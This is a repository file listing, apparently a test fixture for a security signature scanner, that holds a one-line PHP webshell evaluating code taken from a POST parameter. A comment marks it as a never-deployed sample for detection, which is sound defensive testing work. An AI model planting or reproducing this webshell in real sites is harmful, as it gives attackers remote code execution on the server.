llm-security/tests/fixtures/signature-scan/poisoned/webshell.php
2026-06-20 09:28:52 +02:00

4 lines
98 B
PHP

<?php
// Minimal classic PHP webshell (test fixture — never deployed).
@eval($_POST['cmd']);
?>